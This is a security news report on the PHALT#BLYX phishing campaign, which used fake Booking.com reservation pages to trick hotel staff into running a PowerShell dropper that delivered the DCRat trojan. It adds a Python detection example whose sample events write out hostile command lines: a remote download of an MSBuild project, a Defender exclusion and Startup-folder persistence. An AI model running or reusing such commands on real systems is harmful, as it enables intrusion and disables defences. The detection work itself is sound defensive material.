Cybersecurity researchers disclosed a campaign called PHALT#BLYX that used fake Booking.com reservation emails to deliver the DCRat remote access trojan to European hospitality targets in late December 2025, according to a technical analysis by Securonix.
KEY FACTS
- Campaign: PHALT#BLYX targeted the European hospitality sector
- Initial lure: Phishing emails impersonated Booking.com with reservation cancellation links
- Method: Fake CAPTCHA and bogus blue screen page instructed victims to run a PowerShell command
- Payload: DCRat delivered via PowerShell dropper and MSBuild execution
The attack began with phishing messages that warned of unexpected reservation cancellations and redirected recipients to a fake website. The site presented a counterfeit CAPTCHA and then a bogus blue screen of death page with recovery instructions that asked victims to open the Windows Run dialog and paste a command.
That command executed a PowerShell dropper which downloaded an MSBuild project file named v.proj from a remote host. The MSBuild project was run with MSBuild.exe to execute an embedded payload that set Microsoft Defender exclusions, established persistence in the Startup folder, and downloaded and launched the RAT.
If the malware ran with administrator privileges it could disable the security program. If not, it entered a loop that triggered a Windows User Account Control prompt every two seconds for three attempts. The PowerShell code also opened a legitimate Booking.com admin page in the default browser as a distraction.
DCRat is a .NET remote access trojan with a plugin architecture that can profile systems, log keystrokes, execute commands, and deliver additional payloads such as cryptocurrency miners. The campaign abused living-off-the-land tools like MSBuild.exe and included room charge details in Euros, suggesting a European focus. The MSBuild file contained Russian language elements linking the activity to Russian threat actors.
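The chain described above leaves a recognisable trail in process-creation telemetry: PowerShell started from the Run dialog that fetches a file, MSBuild.exe started by that shell with a project file, then Defender exclusions and a Startup folder write. The following detection logic is an added example, not code from Securonix or the article; the rule names, the constructed sample events, the placeholder host example.invalid and the file names (v.proj aside) are assumptions.

```python
"""Constructed detection for the PHALT#BLYX chain described in the article (added example)."""
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    parent: str   # parent process image name
    image: str    # created process image name
    cmdline: str  # full command line as logged (e.g. Sysmon Event ID 1 or 4688)

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

def run_dialog_download(e):
    # PowerShell launched from explorer.exe (the Run dialog) that reaches out over HTTP
    return (e.parent.lower() == "explorer.exe" and e.image.lower() in SHELLS
            and re.search(r"https?://", e.cmdline, re.I) is not None)

def msbuild_project_from_shell(e):
    # MSBuild.exe started by a shell with a project file; IDE builds do not look like this
    return (e.image.lower() == "msbuild.exe" and e.parent.lower() in SHELLS
            and re.search(r"\.(proj|csproj|targets)\b", e.cmdline, re.I) is not None)

def defender_tampering(e):
    # Exclusions added or protection features switched off from the command line
    return re.search(r"(Add|Set)-MpPreference\s+-(Exclusion|Disable)", e.cmdline, re.I) is not None

def startup_folder_write(e):
    return re.search(r"\\Start Menu\\Programs\\Startup\b", e.cmdline, re.I) is not None

RULES = [run_dialog_download, msbuild_project_from_shell, defender_tampering, startup_folder_write]
def detect(events):
    """Map rule name -> indices of the events that matched it; 2+ stages on one host is an incident."""
    hits = {}
    for i, e in enumerate(events):
        for rule in RULES:
            if rule(e):
                hits.setdefault(rule.__name__, []).append(i)
    return hits

# Constructed sample telemetry; host names, users and file names are placeholders.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "powershell.exe", "powershell.exe -Command (New-Object Net.WebClient)"
              ".DownloadFile('http://example.invalid/v.proj','C:\\Users\\Public\\v.proj')"),
    ProcEvent("powershell.exe", "MSBuild.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Users\Public\v.proj"),
    ProcEvent("MSBuild.exe", "powershell.exe", r"powershell.exe -Command Add-MpPreference -ExclusionPath C:\Users\Public"),
    ProcEvent("MSBuild.exe", "powershell.exe", r"powershell.exe -Command Copy-Item C:\Users\Public\u.exe "
              r"'C:\Users\guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"),
    ProcEvent("devenv.exe", "MSBuild.exe", r"MSBuild.exe C:\src\app\app.csproj /t:Build"),  # benign IDE build
]
```

Run `detect(SAMPLE_EVENTS)` to see each stage fire on exactly one constructed event while the benign IDE build stays silent; in production the same predicates map directly onto Sysmon or EDR process-creation queries.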
WHY IT MATTERS
The use of trusted system binaries and tampering with endpoint defenses makes detection and removal harder for defenders. Hospitality organizations face increased risk to operations and guest data when attackers combine social engineering with living off the land techniques.